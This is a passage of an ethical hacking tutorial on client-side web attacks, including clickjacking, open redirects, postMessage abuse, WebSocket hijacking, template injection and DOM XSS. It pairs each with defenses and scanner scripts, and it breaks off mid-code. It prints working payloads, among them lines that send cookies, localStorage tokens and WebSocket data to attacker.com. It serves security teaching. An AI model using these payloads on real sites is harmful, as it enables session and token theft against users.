Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS



What will I learn

  • Clickjacking: tricking users into clicking hidden elements through invisible iframes;
  • Open redirects: weaponizing trusted domains for phishing campaigns;
  • postMessage vulnerabilities: exploiting cross-origin communication;
  • WebSocket hijacking: the CSRF equivalent for real-time connections;
  • Local storage theft and why it's worse than cookie theft;
  • DOM XSS through client-side template injection in Angular, React, and Vue;
  • Building automated scanning tools for each attack class.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • Your hacking lab from Episode 2;
  • Basic HTML/JavaScript knowledge;
  • Python 3 with requests (pip install requests);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Intermediate


Solutions to Episode 22 Exercises

Exercise 1 -- Business logic exploitation:

(a) Negative quantity: POST /api/cart/add {"product":"laptop","quantity":-2}
    Cart total: 49.99 * -2 = -$99.98 (store OWES the attacker)

(b) Race condition on coupon: 20 threads, 8-12 successful redemptions
    HALFOFF applied multiple times: total reduced from $49.99 to ~$0.02

(c) Transfer race: 10 simultaneous $100 transfers from user1 to user2
    user1 balance: -$800 (went negative), user2 balance: $1100
    Total money in system: $300 (started with $200) -- money created from nothing

(d) Checkout manipulation: POST /api/checkout {"amount": 0.01}
    Charged: $0.01, Cart total: $49.99 -- paid one cent for a $50 item

The key insight: every attack used perfectly valid HTTP requests with well-formed JSON. No injection. No encoding tricks. Just values the developers didn't anticipate.

Exercise 2 -- Race condition tester:

import requests, threading

def race_test(url, method, body, headers, threads=20, expected_max=1):
    results = []
    def fire():
        try:
            r = getattr(requests, method.lower())(url, json=body, headers=headers, timeout=5)
            results.append((r.status_code, r.json()))
        except (requests.exceptions.RequestException, ValueError):
            # ValueError covers non-JSON response bodies from r.json()
            results.append((0, {}))

    ts = [threading.Thread(target=fire) for _ in range(threads)]
    for t in ts: t.start()
    for t in ts: t.join()

    ok = sum(1 for code, _ in results if code == 200)
    print(f"Success: {ok}/{len(results)}")
    if ok > expected_max:
        print(f"[!] RACE CONDITION: {ok} successes (expected max {expected_max})")
    else:
        print(f"[*] No race detected (within expected bounds)")
    return results

Exercise 3 -- Fixes:

# Quantity validation
quantity = data.get('quantity', 1)
if not isinstance(quantity, int) or quantity < 1:
    return jsonify({"error": "Quantity must be a positive integer"}), 400

# Atomic coupon with lock
coupon_lock = threading.Lock()
def apply_coupon():
    with coupon_lock:
        if coupon['used']:
            return jsonify({"error": "Already used"}), 400
        coupon['used'] = True
        cart['total'] *= (1 - coupon['discount'] / 100)

# Atomic transfer with lock
transfer_lock = threading.Lock()
def transfer():
    with transfer_lock:
        if balances[sender] < amount:
            return jsonify({"error": "Insufficient funds"}), 400
        balances[sender] -= amount
        balances[receiver] += amount

# Server-side total at checkout (ignore client amount)
def checkout():
    return jsonify({"charged": cart['total']})

Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS

We covered XSS in episodes 14 and 15. Reflected XSS, stored XSS, DOM-based XSS, filter bypasses, CSP evasion -- the full spectrum. And XSS is probably the most famous client-side vulnerability because it's dramatic: you inject JavaScript, the browser executes it, the victim's session is stolen. Clear input, clear output, clear impact.

But XSS is NOT the only client-side attack. The browser is a staggeringly complex application that enforces dozens of security boundaries: same-origin policy, Content Security Policy, frame embedding rules, cookie scope, CORS, postMessage channels, local storage isolation, WebSocket origin checking. Every one of those boundaries exists because there's an attack that exploits the gap when the boundary is missing or misconfigured. And unlike server-side vulnerabilities where you need to reach the server's code, client-side attacks execute in the VICTIM'S browser -- a machine you don't control, running a browser you didn't choose, on a network you can't observe. The attack surface is the user's own software.

The battlefield is the browser. And the user doesn't even know it.

Today we look at everything else in the client-side landscape. Clickjacking, open redirects, postMessage abuse, WebSocket hijacking, local storage theft, DOM-based template injection, and browser cache poisoning. Some of these require an XSS as a precondition. Others don't -- they exploit entirely separate mechanisms that have nothing to do with script injection. Together with XSS, they form the complete picture of what can go wrong when the browser is the execution environment.

Clickjacking: The Invisible Click

Clickjacking is beautifully simple. The attacker loads a target website inside an invisible iframe on their own page. The iframe is transparent -- opacity zero, z-index above everything else. Below the iframe, the attacker positions their own UI elements: buttons, forms, whatever looks enticing. The victim sees the attacker's page. They click what they think is the attacker's button. They actually click whatever is at that position in the invisible iframe. The target site receives a legitimate click from an authenticated user who had no idea they were interacting with it.

This is fundamentally different from CSRF (episode 16). CSRF submits a forged request. Clickjacking makes the user submit the request THEMSELVES, through a real browser interaction with the real target site, in a real authenticated session. The click is genuine. The intent is not.

<!-- clickjack.html -- attacker hosts this on their own server -->
<html>
<head><title>Win a Prize!</title></head>
<body>
<h1>Click the button to claim your reward!</h1>

<!-- Transparent iframe covering the "button" area -->
<iframe src="http://192.168.56.101/dvwa/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change"
  style="position:absolute; top:80px; left:50px; width:600px; height:400px; opacity:0.0; z-index:2;">
</iframe>

<!-- Visible "button" positioned under the iframe's submit button -->
<button style="position:absolute; top:250px; left:200px; z-index:1; font-size:24px; padding:20px;">
  Claim Prize!
</button>
</body>
</html>

The victim sees "Claim Prize!" and clicks. They actually clicked the DVWA password change form's submit button inside the invisible iframe. Their DVWA password is now "hacked." They never saw DVWA. They never knew they were interacting with it. The browser did exactly what it was told -- render an iframe, process a click -- and the result is an unauthorized action by an authenticated user.

Where clickjacking gets really dangerous is on social media and financial platforms. "Like" buttons, "Follow" buttons, "Transfer" buttons, "Approve" buttons -- any single-click action that the attacker can position under their decoy is vulnerable. Facebook's "Like" button was famously clickjacked for years before they implemented frame-busting (the original "likejacking" attacks of 2010-2012). The fix is straightforward:

X-Frame-Options: DENY

Or the modern equivalent:

Content-Security-Policy: frame-ancestors 'none'

Both tell the browser: do NOT render this page inside a frame. If someone tries to iframe the site, the browser refuses. The page only renders as a top-level document. This one header blocks all clickjacking attacks -- and yet a staggering number of production sites still don't set it. Why? Because the header doesn't affect functionality. The site works fine without it. It only matters when someone is actively attacking your users, and until that happens nobody notices it's missing ;-)

Having said that, X-Frame-Options is the older header with limited options (DENY or SAMEORIGIN). frame-ancestors in CSP is more flexible -- you can whitelist specific origins that ARE allowed to frame your site. Modern applications should use CSP frame-ancestors and set X-Frame-Options as a fallback for older browsers.
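To make the defense concrete, here's a minimal sketch of a server that sends both headers on every response. The handler class and route are illustrative assumptions (standard library only), not code from the episode:

```python
#!/usr/bin/env python3
"""Sketch: emit both anti-framing headers on every response (stdlib only)."""
from http.server import BaseHTTPRequestHandler, HTTPServer

class HardenedHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = b'Not frameable'
        self.send_response(200)
        # Modern control: CSP frame-ancestors (here: no framing at all)
        self.send_header('Content-Security-Policy', "frame-ancestors 'none'")
        # Fallback for older browsers that ignore frame-ancestors
        self.send_header('X-Frame-Options', 'DENY')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)

# To run it locally:
# HTTPServer(('127.0.0.1', 8000), HardenedHandler).serve_forever()
```

A browser receiving either header will refuse to render the page inside a frame; sending both covers old and new browsers at once.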

Open Redirects: Weaponizing Trust

An open redirect is a URL on a trusted domain that bounces the user to any URL specified in a parameter:

https://trusted-bank.com/redirect?url=https://evil-attacker.com/fake-login

This looks harmless -- it's just a redirect, right? But consider the social engineering angle. You're a bank customer. You receive an email: "Please verify your account." The link is https://trusted-bank.com/redirect?url=https://evil-attacker.com/fake-login. You hover over the link (because you're security-conscious!) and see trusted-bank.com. The domain is correct. You click. You land on a page that looks exactly like the bank's login. You type your username and password. Except you're on evil-attacker.com now, and your credentials just went to the attacker.

Open redirects make phishing dramatically more effective because the initial URL is on the REAL domain. The user did their due diligence -- they checked the URL -- and was still fooled. This is why open redirects are classified as vulnerabilities despite being "just a redirect." The redirect itself doesn't compromise the server. It compromises the users' TRUST in the server's URL.

#!/usr/bin/env python3
"""Open redirect finder -- tests common redirect parameters."""
import requests
from urllib.parse import urlencode

TARGET = "http://192.168.56.101"
REDIRECT_PARAMS = ['url', 'redirect', 'next', 'return', 'returnUrl', 'goto',
                   'redirect_uri', 'continue', 'dest', 'destination', 'rurl',
                   'return_to', 'forward', 'target', 'out', 'view', 'redir',
                   'ReturnUrl', 'checkout_url', 'return_path']
CANARY = "http://evil.com"

print(f"[*] Testing {len(REDIRECT_PARAMS)} redirect parameters on {TARGET}")

for param in REDIRECT_PARAMS:
    test_url = f"{TARGET}/redirect?{urlencode({param: CANARY})}"
    try:
        resp = requests.get(test_url, allow_redirects=False, timeout=5)
        location = resp.headers.get('Location', '')
        if CANARY in location:
            print(f"[+] Open redirect via '{param}': {test_url}")
            print(f"    Redirects to: {location}")
        elif resp.status_code in [301, 302, 303, 307, 308]:
            print(f"[?] Redirect on '{param}' but to: {location}")
    except requests.exceptions.RequestException:
        pass

Open redirects also chain with other vulnerabilities. An open redirect + an OAuth implementation that validates redirect URIs by prefix means you can steal OAuth tokens. The OAuth spec says the redirect URI must match exactly, but many implementations check "does it START WITH the registered domain?" If trusted-bank.com/redirect?url=attacker.com passes that check (because it starts with trusted-bank.com), the OAuth token gets redirected to the attacker. That's how open redirects escalate from "low severity" to "account takeover" in the real world.
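The flawed prefix check versus the exact match the spec demands fits in a few lines. The function names are illustrative (no real OAuth library is assumed):

```python
# Sketch: why prefix matching of redirect URIs enables token theft
REGISTERED = "https://trusted-bank.com/callback"

def validate_redirect_broken(uri):
    # Flawed: "starts with the registered domain" -- the open redirect passes
    return uri.startswith("https://trusted-bank.com")

def validate_redirect_strict(uri):
    # Correct per the OAuth spec: exact match against the registered URI
    return uri == REGISTERED

evil = "https://trusted-bank.com/redirect?url=https://evil-attacker.com/fake-login"
print(validate_redirect_broken(evil))   # True  -- token would leak
print(validate_redirect_strict(evil))   # False -- chain is blocked
```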

postMessage Attacks: The Overlooked Channel

Modern web applications use window.postMessage() for cross-origin communication between windows and iframes. It's the legitimate way to send data between different origins -- the browser's built-in alternative to the hacks developers used before (like URL fragment communication or shared cookies). The API is simple: one window sends a message, the other window receives it.

The vulnerability: if the receiving window doesn't validate where the message came from, ANY page can send messages to it.

// VULNERABLE listener -- accepts messages from ANY origin
window.addEventListener('message', function(event) {
    // No origin check! Any page that opens or frames us can send messages
    document.getElementById('output').innerHTML = event.data;
    // innerHTML + attacker-controlled data = XSS
});
<!-- Attacker's page that loads the vulnerable app in an iframe -->
<iframe id="target" src="https://vulnerable-app.com/dashboard"></iframe>
<script>
// Wait for iframe to load, then send a malicious message
document.getElementById('target').onload = function() {
    this.contentWindow.postMessage(
        '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">',
        '*'
    );
};
</script>

If the listener uses innerHTML to display the message (instead of textContent), the attacker just achieved XSS through the postMessage channel. But even with textContent, if the listener does something security-sensitive -- updates user preferences, triggers a state change, redirects the page, modifies DOM elements that affect application logic -- the attacker controls the input.

The fix is one line:

window.addEventListener('message', function(event) {
    if (event.origin !== 'https://trusted-partner.com') return;
    // Now safe to process event.data
    document.getElementById('output').textContent = event.data;
});

Always check event.origin. Never use '*' as the target origin when sending messages that contain sensitive data. Never use innerHTML with received message data. These are the postMessage security rules, and they're violated constantly because the developer tests their own origin (where the messages are legitimate) and never considers that an attacker's page could send messages too.

In pentests, postMessage vulnerabilities are found by searching the application's JavaScript for addEventListener('message' and checking whether the handler validates event.origin. If it doesn't, you have a vulnerability. The impact depends on what the handler DOES with the message data -- from benign (displays text) to critical (triggers actions, stores data, evaluates code).
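That search can be roughly automated: flag any 'message' listener whose nearby code never touches .origin. This is a heuristic sketch only -- a proper per-handler check needs AST or taint analysis:

```python
#!/usr/bin/env python3
"""Heuristic: find 'message' listeners with no nearby origin check."""
import re

def find_unchecked_listeners(js):
    """Return offsets of message listeners whose next ~500 chars lack '.origin'."""
    findings = []
    for m in re.finditer(r'addEventListener\s*\(\s*[\'"]message[\'"]', js):
        window = js[m.start():m.start() + 500]
        if not re.search(r'\.origin\b', window):
            findings.append(m.start())
    return findings

vulnerable = "window.addEventListener('message', function(e){ el.innerHTML = e.data; });"
safe = ("window.addEventListener('message', function(e){ "
        "if (e.origin !== 'https://a.com') return; });")
print(find_unchecked_listeners(vulnerable))  # one finding
print(find_unchecked_listeners(safe))        # []
```

The 500-character window is an arbitrary choice; handlers that delegate to a function defined elsewhere will produce false positives, so treat every hit as a lead for manual review, not a confirmed finding.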

Local Storage Theft: The Missing HttpOnly

Back in episode 14, we covered how XSS steals session cookies. But many modern SPAs (Single Page Applications) don't USE cookies for authentication. They use JWT tokens stored in localStorage. And localStorage has a critical security gap compared to cookies: there is no HttpOnly equivalent.

// The application stores the JWT in localStorage (extremely common in SPAs)
localStorage.setItem('auth_token', 'eyJhbGciOi...');
localStorage.setItem('refresh_token', 'eyJhbGciOi...');
localStorage.setItem('user_role', 'admin');

// Any XSS on the same origin can read ALL of it
var stolen = {
    auth: localStorage.getItem('auth_token'),
    refresh: localStorage.getItem('refresh_token'),
    role: localStorage.getItem('user_role')
};
fetch('https://attacker.com/collect', {
    method: 'POST',
    body: JSON.stringify(stolen)
});

With HttpOnly cookies, even if you achieve XSS, you can NOT read the cookie from JavaScript. The browser enforces this -- document.cookie simply doesn't return HttpOnly cookies. The attacker can use the XSS to make requests (the cookie is sent automatically), but they can't steal the cookie itself. The attack is limited to the XSS session.

With localStorage, there's no such restriction. Any JavaScript running on the same origin reads everything. The XSS steals the token, the attacker uses it from their own machine, and the victim can't even tell -- closing the browser doesn't invalidate the stolen token. The attacker has persistent access until the token expires or is revoked.

This is why security professionals (and OWASP, and basically every security guide published since 2018) recommend HttpOnly cookies over localStorage for authentication tokens in web applications. The cookie is invisible to JavaScript -- localStorage is a glass cabinet.

Having said that, localStorage tokens aren't inherently insecure. If your site has ZERO XSS vulnerabilities, the tokens are safe. But "zero XSS" is a strong assumption for any non-trivial web application. Cookies with HttpOnly give you defense in depth: even if XSS appears, the authentication tokens survive. That's the security engineering mindset -- assume breaches happen and design layers that limit damage.
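For contrast, here's what issuing the token as a hardened cookie looks like, using only Python's standard library (the token value is a placeholder):

```python
# Sketch: building the Set-Cookie header for an HttpOnly session token
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie['auth_token'] = 'eyJhbGciOi...'            # placeholder JWT
cookie['auth_token']['httponly'] = True           # invisible to document.cookie
cookie['auth_token']['secure'] = True             # only sent over HTTPS
cookie['auth_token']['samesite'] = 'Strict'       # not sent cross-site
cookie['auth_token']['path'] = '/'

# The Set-Cookie header value the server would emit:
print(cookie['auth_token'].OutputString())
```

Even with a working XSS on this origin, JavaScript cannot read this token; SameSite=Strict additionally blocks the browser from attaching it to cross-site requests, which also hardens against the CSRF-style attacks in this episode.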

WebSocket Hijacking: CSRF's Real-Time Cousin

WebSocket connections don't follow the same rules as HTTP. There are no CORS restrictions on WebSocket connections. The browser sends cookies automatically (just like HTTP), but the server receives the connection from whatever page initiated it. If the WebSocket server doesn't verify the Origin header, any web page can open a WebSocket connection to it:

// Attacker's page -- opens a WebSocket to the target server
// The browser sends the victim's cookies automatically
var ws = new WebSocket('ws://vulnerable-app.com/live-data');

ws.onopen = function() {
    console.log('[+] Connected -- browser sent auth cookies automatically');
    // Send commands as the authenticated user
    ws.send(JSON.stringify({action: 'get_messages', since: 0}));
};

ws.onmessage = function(event) {
    // Receive real-time data intended for the authenticated user
    fetch('https://attacker.com/exfil', {
        method: 'POST',
        body: event.data
    });
};

This is Cross-Site WebSocket Hijacking (CSWSH) -- the WebSocket equivalent of CSRF. The victim visits the attacker's page. The page opens a WebSocket to the vulnerable server. The browser includes the victim's authentication cookies. The server sees a valid authenticated connection and starts sending data. The attacker's page receives the data and exfiltrates it.

The impact depends on what the WebSocket carries. Chat messages? The attacker reads private conversations. Financial data? Real-time portfolio information, trade notifications. Administrative actions? The attacker sends commands as the admin.

The defense is origin validation on the server side:

# Server-side WebSocket connection handler
async def websocket_handler(websocket, path):
    origin = websocket.request_headers.get('Origin', '')
    allowed = ['https://vulnerable-app.com', 'https://www.vulnerable-app.com']

    if origin not in allowed:
        await websocket.close(1008, 'Origin not allowed')
        return

    # Origin validated -- proceed with connection
    async for message in websocket:
        await process_message(websocket, message)

Many WebSocket libraries and frameworks do NOT check the Origin header by default. The developer sets up the WebSocket endpoint, the front-end connects, messages flow, everything works. Nobody thinks about what happens when a DIFFERENT page connects with the same cookies. The pattern is identical to CSRF: the browser's automatic credential inclusion enables cross-origin attacks, and the defense is origin validation ;-)
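You can test an endpoint for CSWSH without a victim by replaying the handshake with a forged Origin header. This sketch builds a raw RFC 6455 handshake with the standard library; the host, port, and path are lab assumptions, and note it sends no cookies, so it tests origin validation only, not an authenticated hijack:

```python
#!/usr/bin/env python3
"""cswsh_probe.py -- check whether a WebSocket endpoint validates Origin."""
import base64
import os
import socket

def build_handshake(host, path, origin):
    """Raw RFC 6455 client handshake with an attacker-chosen Origin."""
    key = base64.b64encode(os.urandom(16)).decode()
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Upgrade: websocket\r\n"
            "Connection: Upgrade\r\n"
            f"Sec-WebSocket-Key: {key}\r\n"
            "Sec-WebSocket-Version: 13\r\n"
            f"Origin: {origin}\r\n\r\n")

def probe_cswsh(host, port, path, origin="https://evil.com"):
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(build_handshake(host, path, origin).encode())
        status = s.recv(1024).decode(errors='replace').split('\r\n')[0]
    # 101 Switching Protocols despite the forged Origin = no origin validation
    if '101' in status:
        return f"[!] VULNERABLE: handshake accepted with Origin {origin}"
    return f"[*] Rejected: {status}"

# Example against a lab target:
# print(probe_cswsh("192.168.56.101", 8080, "/live-data"))
```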

Client-Side Template Injection

Modern JavaScript frameworks use template expressions that evaluate code within their own sandboxed context. If user input reaches a template expression, the attacker can break out of the sandbox and execute arbitrary JavaScript:

Angular (the most infamous):

// User input rendered in Angular template context
{{constructor.constructor('alert(document.domain)')()}}

// Older Angular versions (1.x) had even simpler payloads:
{{$on.constructor('alert(1)')()}}

Vue.js:

// If user input reaches a Vue template
{{_openBlock.constructor('alert(1)')()}}

// Or through v-html directive (equivalent to innerHTML):
<div v-html="userInput"></div>

These payloads don't contain <script> tags. They don't use event handlers like onerror. They don't look like XSS to a traditional WAF. They execute JavaScript through the framework's own template engine, which evaluates the expression, reaches the constructor.constructor chain (which is Function()), and executes arbitrary code. This bypasses every XSS filter that looks for HTML injection signatures because the payload is framework-specific, not HTML-specific.

Client-side template injection (CSTI) is essentially XSS through a different door. The impact is the same -- arbitrary JavaScript execution in the victim's browser. But the detection is harder because the payload looks like a template expression, not a script tag. If the WAF doesn't understand the framework being used, it won't catch the payload.

Where CSTI appears: any place where user input is interpolated into a template without sanitization. URL parameters displayed in the page, search terms shown in results, error messages containing user input, chat messages rendered through a framework component. The developer uses {{variable}} thinking it's safe (Angular auto-escapes for HTML!) but the auto-escaping handles HTML entities, not template expressions. The input {{1+1}} renders as 2, proving the template engine evaluates user input.
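A server-side probe can only verify the precondition -- that the raw expression survives into the page unescaped -- because the evaluation happens in the victim's browser. A hedged sketch (the target URL and parameter name are assumptions):

```python
#!/usr/bin/env python3
"""csti_probe.py -- check whether a template expression is reflected unescaped."""
import requests

PROBE = "{{7*7}}"

def reflected_unescaped(body):
    # Precondition for CSTI: the raw probe reaches the HTML untouched.
    # HTML-entity encoding of { and } would break template evaluation.
    return PROBE in body

def csti_reflection_check(url, param="q"):
    resp = requests.get(url, params={param: PROBE}, timeout=10)
    return reflected_unescaped(resp.text)

# If this returns True, load the page in a browser: seeing "49" instead of
# "{{7*7}}" confirms the framework evaluates user input.
# print(csti_reflection_check("http://192.168.56.101/search"))
```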

DOM XSS: Sources and Sinks

We touched on DOM XSS in episode 14, but it deserves deeper treatment in the context of client-side attacks. DOM XSS happens entirely in the browser -- the server never sees the payload. The attacker's input enters through a source (a place where attacker-controlled data enters JavaScript) and reaches a sink (a place where the data causes execution).

Sources (attacker-controlled input):
  document.location       location.hash          location.search
  location.href           document.URL           document.referrer
  window.name             postMessage data       localStorage.getItem()
  sessionStorage          URL fragment (#)       URL search params (?)

Sinks (dangerous execution points):
  innerHTML               outerHTML              document.write()
  eval()                  setTimeout(string)     setInterval(string)
  Function()              element.src =          element.href =
  jQuery.html()           $.html()               insertAdjacentHTML()

When a source connects to a sink without sanitization, you have DOM XSS:

// SOURCE: location.hash -- attacker controls the URL fragment
var userInput = location.hash.substring(1);

// SINK: innerHTML -- browser parses the string as HTML
document.getElementById('greeting').innerHTML = 'Hello, ' + userInput;

// Attack URL: https://target.com/#<img src=x onerror=alert(document.cookie)>
// The payload goes from URL fragment -> JavaScript variable -> innerHTML -> execution
// The server never sees the fragment (browsers don't send # data in HTTP requests)

The critical difference from reflected XSS: the payload is in the URL fragment (#...), which the browser does NOT send to the server. Server-side logging shows a clean request. Server-side input validation never fires. WAFs sitting in front of the server can't inspect what they never receive. The entire attack happens in the browser's JavaScript runtime.

Here's an automated scanner that finds these patterns:

#!/usr/bin/env python3
"""dom_xss_scan.py - Scan JavaScript for potential DOM XSS sinks and sources."""
import re
import sys
import requests

# DOM XSS sources (where attacker-controlled data enters)
SOURCES = [
    r'document\.location', r'document\.URL', r'document\.referrer',
    r'location\.hash', r'location\.search', r'location\.href',
    r'window\.name', r'document\.cookie',
    r'postMessage', r'localStorage\.getItem', r'sessionStorage\.getItem',
]

# DOM XSS sinks (where data causes execution)
SINKS = [
    r'innerHTML', r'outerHTML', r'document\.write',
    r'eval\s*\(', r'setTimeout\s*\(', r'setInterval\s*\(',
    r'Function\s*\(', r'\.src\s*=', r'\.href\s*=',
    r'jQuery\.html\(', r'\$\([^)]+\)\.html\(',
    r'insertAdjacentHTML',
]

def scan_js(content, filename=""):
    findings = []
    lines = content.split('\n')

    for i, line in enumerate(lines, 1):
        for source in SOURCES:
            if re.search(source, line):
                findings.append(('SOURCE', source, i, line.strip()[:120]))
        for sink in SINKS:
            if re.search(sink, line):
                findings.append(('SINK', sink, i, line.strip()[:120]))

    return findings

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if not target:
        print("Usage: python3 dom_xss_scan.py <url_or_file>")
        sys.exit(1)

    if target.startswith("http"):
        content = requests.get(target, timeout=15).text
    else:
        with open(target) as f:
            content = f.read()

    findings = scan_js(content, target)

    sources = [f for f in findings if f[0] == 'SOURCE']
    sinks = [f for f in findings if f[0] == 'SINK']

    print(f"\n[*] DOM XSS Analysis: {target}")
    print(f"    Sources found: {len(sources)}")
    print(f"    Sinks found:   {len(sinks)}")

    if sources:
        print(f"\n--- SOURCES (attacker-controlled input) ---")
        for _, pattern, line, code in sources:
            print(f"  Line {line}: {code}")

    if sinks:
        print(f"\n--- SINKS (dangerous output) ---")
        for _, pattern, line, code in sinks:
            print(f"  Line {line}: {code}")

    if sources and sinks:
        print(f"\n[!] Both sources AND sinks found -- manual review needed")
        print(f"    Check if any source flows into any sink without sanitization")
    elif sinks and not sources:
        print(f"\n[?] Sinks found but no obvious sources")
        print(f"    Check for data flow from other files or indirect sources")

This finds the individual pieces -- sources and sinks -- but can't trace data flow between them (that requires a proper taint analysis engine like those in Burp Suite or Semgrep). In practice, finding sources and sinks in the same file is enough to warrant manual investigation. If location.hash and innerHTML both appear in the same JavaScript file, there's a reasonable chance they're connected.

Browser Cache Poisoning

Here's one that doesn't get enough attention. If an application reflects user input into a cached response, the attacker's payload persists in the cache and is served to OTHER users who request the same resource. This turns a reflected vulnerability into a stored one without touching the server's database:

# Normal request -- response gets cached by CDN or browser
GET /page?lang=en HTTP/1.1
Host: target.com

# Poisoned request -- inject payload via a header the CDN caches on
GET /page HTTP/1.1
Host: target.com
X-Forwarded-Host: attacker.com

# If the application uses X-Forwarded-Host to build URLs in the response,
# the cached response now contains attacker.com URLs
# Every subsequent visitor gets the poisoned cached version

The specific technique varies depending on what headers the CDN caches on and what headers the application reflects. The general principle: if you can influence a cached response, your payload is served to every user who hits that cache entry. This is why cache keys and cache-control headers matter -- they determine which request variations get distinct cache entries and which ones share a cache entry.
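The methodology can be sketched as a probe: poison a uniquely cache-busted URL through a candidate unkeyed header, then re-request the same URL without the header and see whether the canary comes back from the cache. The header list and helper names are assumptions for a lab setup:

```python
#!/usr/bin/env python3
"""cache_poison_probe.py -- test candidate unkeyed headers against a cached page."""
import uuid
import requests

CANDIDATE_HEADERS = ['X-Forwarded-Host', 'X-Forwarded-Scheme', 'X-Host']

def is_poisoned(clean_body, canary):
    # The second request sent NO header -- if the canary is still in the
    # response, it was served from the poisoned cache entry.
    return canary in clean_body

def probe_cache_poisoning(url):
    for header in CANDIDATE_HEADERS:
        buster = uuid.uuid4().hex          # unique param -> fresh cache entry
        canary = f"canary-{buster}.evil.com"
        try:
            requests.get(url, params={'cb': buster},
                         headers={header: canary}, timeout=10)
            clean = requests.get(url, params={'cb': buster}, timeout=10)
        except requests.exceptions.RequestException:
            continue
        if is_poisoned(clean.text, canary):
            print(f"[!] Cache poisoning via unkeyed header: {header}")
        else:
            print(f"[*] {header}: not reflected from cache")

# probe_cache_poisoning("http://192.168.56.101/page")
```

The cache-buster keeps the probe from poisoning a cache entry that real users share -- essential when testing anything outside your own lab.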

In 2018, security researcher James Kettle from PortSwigger published groundbreaking research on web cache poisoning that affected sites like Mozilla, GitHub, and Cloudflare customers. The attacks used unkeyed headers (headers that the cache ignores when computing the cache key but the application processes and reflects) to inject malicious content into cached responses. A single poisoned request could affect thousands of users for the duration of the cache TTL.

The Clickjacking PoC Generator

Let's build a practical tool for pentests:

#!/usr/bin/env python3
"""clickjack_tester.py - Test and generate clickjacking PoC pages."""
import sys
import requests

def check_framing(url):
    """Check if the target can be framed (clickjacked)."""
    try:
        resp = requests.get(url, timeout=10, allow_redirects=True)
    except requests.exceptions.RequestException as e:
        return f"ERROR: {e}"

    xfo = resp.headers.get('X-Frame-Options', '').upper()
    csp = resp.headers.get('Content-Security-Policy', '')

    frame_ancestors = ''
    if 'frame-ancestors' in csp:
        for directive in csp.split(';'):
            if 'frame-ancestors' in directive:
                frame_ancestors = directive.strip()

    if xfo == 'DENY' or "frame-ancestors 'none'" in frame_ancestors:
        return 'PROTECTED (cannot be framed)'
    elif xfo == 'SAMEORIGIN' or "frame-ancestors 'self'" in frame_ancestors:
        return 'PARTIAL (same-origin framing only)'
    elif xfo or frame_ancestors:
        return f'RESTRICTED ({xfo} / {frame_ancestors})'
    else:
        return 'VULNERABLE (no framing protection)'

def generate_poc(target_url, button_text="Click to claim your reward!"):
    """Generate a clickjacking proof-of-concept HTML page."""
    return f"""<!DOCTYPE html>
<html>
<head><title>Clickjacking PoC</title></head>
<body>
<h1 style="font-family: Arial;">{button_text}</h1>
<div style="position: relative; width: 600px; height: 500px;">

  <!-- Visible decoy button -->
  <button style="position: absolute; top: 200px; left: 60px;
    z-index: 1; padding: 15px 30px; font-size: 20px; cursor: pointer;
    background: #4CAF50; color: white; border: none; border-radius: 5px;">
    {button_text}
  </button>

  <!-- Invisible iframe with target page overlaid -->
  <iframe src="{target_url}"
    style="position: absolute; top: 0; left: 0;
    width: 600px; height: 500px; opacity: 0.0001; z-index: 2; border: none;">
  </iframe>

</div>
<p style="margin-top: 520px; color: #999; font-size: 11px;">
  [PoC] The iframe above is invisible. Clicking the button interacts with
  whatever element is at that position in the target page.
</p>
</body>
</html>"""

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 clickjack_tester.py <url> [--poc]")
        sys.exit(1)

    url = sys.argv[1]
    print(f"[*] Target: {url}")
    result = check_framing(url)
    print(f"[*] Status: {result}")

    if '--poc' in sys.argv and 'VULNERABLE' in result:
        poc = generate_poc(url)
        with open("clickjack_poc.html", "w") as f:
            f.write(poc)
        print(f"[+] PoC saved to clickjack_poc.html")
        print(f"[*] Open in a browser to demonstrate the attack")

This does two things: first it checks whether the target has framing protections (X-Frame-Options or CSP frame-ancestors), then optionally generates a PoC HTML page you can open in a browser to demonstrate the clickjacking. In a pentest report, including a working PoC that stakeholders can click (on a test instance!) is dramatically more convincing than describing the vulnerability in text.

The Comprehensive Client-Side Scanner

Let's put it all together into a single reconnaissance tool:

#!/usr/bin/env python3
"""client_side_scanner.py - Check for common client-side attack surfaces."""
import requests
import re
import sys

def scan_target(url):
    """Scan a target URL for client-side vulnerability indicators."""
    print(f"\n{'='*60}")
    print(f"Client-Side Attack Surface Scan: {url}")
    print(f"{'='*60}\n")

    try:
        resp = requests.get(url, timeout=15)
    except requests.exceptions.RequestException as e:
        print(f"[!] Connection failed: {e}")
        return

    headers = resp.headers
    body = resp.text

    # 1. Clickjacking (framing protection)
    xfo = headers.get('X-Frame-Options', '')
    csp = headers.get('Content-Security-Policy', '')
    has_frame_protection = bool(xfo) or 'frame-ancestors' in csp
    status = 'PROTECTED' if has_frame_protection else 'MISSING'
    print(f"[{'+' if has_frame_protection else '!'}] Clickjacking: {status}")
    if xfo: print(f"    X-Frame-Options: {xfo}")
    if 'frame-ancestors' in csp: print(f"    CSP frame-ancestors found")

    # 2. Open redirect indicators
    redirect_params = ['url', 'redirect', 'next', 'return', 'goto',
                       'redirect_uri', 'continue', 'dest', 'rurl']
    for param in redirect_params:
        test = f"{url}?{param}=https://evil.com"
        try:
            r = requests.get(test, allow_redirects=False, timeout=5)
            loc = r.headers.get('Location', '')
            if 'evil.com' in loc:
                print(f"[!] Open redirect via '{param}' parameter")
        except requests.exceptions.RequestException:
            pass  # slow or unreachable parameter probes are not findings

    # 3. localStorage usage in response body
    ls_patterns = re.findall(r'localStorage\.(setItem|getItem)\([\'"]([^\'"]+)', body)
    if ls_patterns:
        print(f"[!] localStorage usage detected:")
        for action, key in ls_patterns:
            print(f"    {action}('{key}')")
        auth_keys = [k for _, k in ls_patterns if any(
            t in k.lower() for t in ['token', 'auth', 'jwt', 'session', 'key'])]
        if auth_keys:
